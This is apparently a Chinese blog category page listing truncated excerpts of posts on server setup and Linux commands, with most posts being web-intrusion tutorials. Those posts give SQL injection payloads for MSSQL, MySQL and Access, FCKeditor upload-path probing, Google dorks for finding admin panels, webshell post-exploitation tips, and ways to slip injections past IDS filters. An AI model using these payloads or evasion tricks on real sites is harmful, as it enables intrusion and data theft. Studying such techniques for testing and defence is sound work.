随笔分类 - 【基础导读】
摘要:服务器安全设置>> IIS6.0的安装 开始菜单—>控制面板—>添加或删除程序—>添加/删除Windows组件 应用程序 ———ASP.NET(可选) |——启用网络 COM+ 访问(必选) |——Internet 信息服务(IIS)———Internet 信息服务管理器(必选) |——公用文件(必选) |——万维网服务———Active Server pages(必选) |——Internet 数据连接器(可选)...
阅读全文
摘要:LINUX文件权限针对的对象分三类(互斥的关系): 1. user(文件的拥有者) 2. group(文件拥有者所在的组,但不包括user) 3. other(其它用户,即user和group以外的) LINUX用一个3位二进制数对应着文件的3种权限(1表示有该权限,0表示无): 第1位 读 r 100 4 第2位 写 w 010 2 第3位 执行 x 001 1 查看权限 #ls -l 第一列,一共10位(drwxrwxrwx),就代表了文件的权限: 1)第一个d代表是一个目录,如果显示“-”,则说明不是一个目录 2)2-4代表user的权限 3)5-7代表group的权限 4)8-10代表
阅读全文
摘要:and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1=(select @@servername) //本地服务名and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员and 1=(Select IS_MEMBER(
阅读全文
摘要:FCKeditorFCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页FCKeditor/_samples/default.html查看编辑器版本FCKeditor/_whatsnew.html查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径Note:[Hell
阅读全文
摘要:系统# uname -a # 查看内核/操作系统/CPU信息# head -n 1 /etc/issue # 查看操作系统版本# cat /proc/cpuinfo # 查看CPU信息# hostname # 查看计算机名# lspci -tv # 列出所有PCI设备# lsusb -tv # 列出所有USB设备# lsmod # 列出加载的内核模块# env # 查看环境变量资源# free -m # 查看内存使用量和交换区使用量# df -h # 查看各分区使用情况# du -sh <目录名> # 查看指定目录的大小# grep MemTotal /proc/meminfo #
阅读全文
摘要:cat ./../mainfile.php -查看mainfile.php文件内容ls -la – 查看文件列表.ifconfig {eth0 etc} – 查看网卡信息.ps aux – 查看运行进程.gcc in_file -o out_file – 编译c文件.cat /etc/passwd – 查看系统账号.sudo – 普通用户运行root权限的命令,前提是 /etc/sudoers中有此账户的规则.id – 查看当前用户各种id.which wget curl w3m lynx – 查看当前可用的下载器uname -r -查看内核版本信息 (or) cat /etc/release
阅读全文
摘要:利用google完全是可以对一个站点进行信息收集和渗透的,下面用google对特定站点进行一次测试。—————————————————————————————————————首先用google先看这个站点的一些基本情况(一些细节部分就略去了):site:xxxx.com从返回的信息中,找到几个该校的几个系院的域名:http//a1.xxxx.comhttp//a2.xxxx.comhttp//a3.xxxx.comhttp//a4.xxxx.com顺便ping了一下,应该是在不同的服务器.先找找网站的管理后台地址:site:xxxx.com intext:管理site:xxxx.com inu
阅读全文
摘要:暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5…..n/*利用内置函数暴数据库信息version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select version() /*and 1=2 union all select database() /*and 1=2 union all select user() /*操作系统信息:and 1=2 union all se
阅读全文
摘要:rar.exe是什么?它就是大名鼎鼎的winrar自带的命令行解压程序。在提权中我们经常要下载各种敏感文件,比如:SU目录。你想一下,如果su目录文件这么多,难道你要一个个的下载??这明显就很麻烦,有了 rar.exe一切变的简单了!好了现在来介绍它的用法吧!得到了Webshell后,最好自己传一个rar.exe,虽然program files目录有,但是有时执行不了。rar.exe体积200K,呵呵!将就下。在CMDSHELL下执行:D:\1\Rar.exe a -k -r -s -m1 E:\web\1.rar E:\web\。我来介绍下吧,”D:\1\rar.exe”是你上传的rar.e
阅读全文
摘要:1)检测是否存在注入点假设我们现在有形如http://www.pengoz.cn/news.php?id=5的URL,现在我们在URL后面添加单引号“ ‘ ”(英文输入法的单引号—CCOz注),则URL变成了http://www.pengoz.cn/news.php?id=5′如果得到了一些错误信息形如“error in sql syntax,check the manual … ”等等,那就意味着你找到注入点了!(在中国,可能不显错,只是页面产生变化,结论同—CCOz注)2)如何确定数据库字段数我们用order by 确定字段数。那么,如何使用这个order by?我们只要增加后面的数字直至
阅读全文
摘要:PHP网页的安全性问题 针对PHP的网站主要存在下面几种攻击方式: 1.命令注入(Command Injection) 2.eval注入(Eval Injection) 3.客户端脚本攻击(script Insertion) 4.跨网站脚本攻击(Cross Site scripting, XSS) 5.SQL注入攻击(SQL injection) 6.跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7.Session 会话劫持(Session Hijacking) 8.Session 固定攻击(Session Fixation) ...
阅读全文
摘要:1.如何判断权限是否为rootand ord(mid(user(),1,1))=114 返回正常 即为ROOT权限,2.注入点只有一个地方显示数据,如何查询多条数据假设这个注入点 只有3 如何显示多条数据?使用concat函数。格式concat(user(),database(),version(),@@datadir)root@localhosthyxy5.1.40-communityC:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\ 这样不好看? 可以自己加个空格oot@loca
阅读全文
摘要:1.and user>0 判断数据库类型(虽然刚才工具中已经判断出来了,但为了学习嘛,从最基本的来)看到回显中的Microsoft JET Database*** 错误我们可以断定是ACCESS数据库了2.and exists (select * from 表名) 猜解表名,返回错误说明表名不存在,返回正常说明表名存在这里我们输入 and exists (select * from admin)返回正常,说明我们输入的表明admin存在3.exists (select 列名 from 表名) 猜解列名,依然是返回错误说明列名不存在,返回正常说明列名存在这里我们输入and exists (
阅读全文
摘要:简介:sql注入一般针对基于web平台的应用程序 由于很多时候程序员在编写程序的时候没有对浏览器端提交的参数进行合法的判断,可以由用户自己修改构造参数(也可以是sql查询语句),并传递至服务器端 获取想要的敏感信息甚至执行危险代码和系统命令就形成了sql注入漏洞,时至今日任然有很大一部分网站存在sql注入漏洞,可想而知sql注入攻击的危害,下面就目前sql注入攻击技术进行总结,让我们更加了解这种攻击与防御方法一、access数据库注入攻击技术目前国内很大一部分网站都是采用asp+access搭建成的本文演示网站是在虚拟机搭建的一套留言板程序http://192.168.80.128:8181/
阅读全文
摘要:1.判断有无注入点' ; and 1=1 and 1=22.猜表: 常见的表:admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) ---判断是否存在admin这张表3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个and 0<(select count(*) from admin)and 1<(select count(*) from admin)4.猜
阅读全文
摘要:查看电脑自身信息c:\>systeminfo主机名: DEEPIN-E2939CCDOS 名称: Microsoft Windows XP ProfessionalOS 版本: 5.1.2600 Service Pack 2 Build 2600OS 制造商: Microsoft CorporationOS 配置: 独立工作站OS 构件类型: Uniprocessor Free注册的所有人: *注册的组织: DEEPIN产品 ID: 76481-640-8834005-23593初始安装日期: 1601-1-1, 0:00:00系统启动时间: 0 天 9 小时 7 分 9 秒系统制造商:
阅读全文
摘要:写在前面:本文没有图,纯理论上做总结,2k字左右,不多,大家耐心点入侵存在运气的几率,我们只有不断的提高自己,才能够将运气的成分将到最小;方法是死的,人是活的,思路更是活的。我就算是抛砖引玉了,说一下我渗透的思路大家可以多多指正。开始渗透现在我们假定要渗透www.xxx.com我们首先要观察,观察网站的类型,这一步不是让你马上有漏洞什么的,而是做到对网站心中有数。大概有这么几种可能1、一眼望去基本全是flash的,看到这个信息,就要做好打持久战的准备了,此时可以用wvs扫一下站点目录,了解站点结构,还有就是扫描ftp弱口令,因为这种flash站很依靠ftp。有时候会遇到非常弱智的密码。2、首页
阅读全文
摘要:当我们对一个运行IDS系统的服务器进行SQL注射时,我们往往会遇到很大的麻烦,因为我们的注射语句被过滤了,如何规避这种检测手段就成了一门新的技术,本文就对此规避技术提出十一条思路和方法,与大家商戳。一、 运用编码技术绕过,如URLEncode编码,ASCII编码绕过。如or 1=1即%6f%72%20%31%3d%31Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)二、 通过空格绕过,如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or’swords’=‘swords’,由于mssql的松散性,我们可以把or ‘swords’之间的空格去掉
阅读全文
摘要:比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多,看看下面的1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msysobjects)>0 access4.注入参数是字符'and [查询条件] and ''='5.搜索时没过滤参数的
阅读全文
摘要:先申明下这方法只对ACCESS数据库的网站有效 关于ACCESS注入的基本常识:第一、ACCESS数据库注入与MySQL方法不同,它的用户列表名,密码字段,以及字段的内容不能用MySQL“暴”的方法来取得。第二、ACCESS只能用“猜”的方法来得到表名和字段,然后再猜解出字段的长度,最后把字段的第一位到第N位分别猜出来。比如说,有一个人心里想着一个数字,另一个人要猜出这个人心里想的是什么数字,所以如果要百分之百、系统性的猜准, 就要有一定的提示。比如说,那个人问,这个数字是否大于100,如果被问的那个人说“不”,那么可以确定,这个数字不 大于100,继续问,是否小于1,如果被问的那个人仍然说“
阅读全文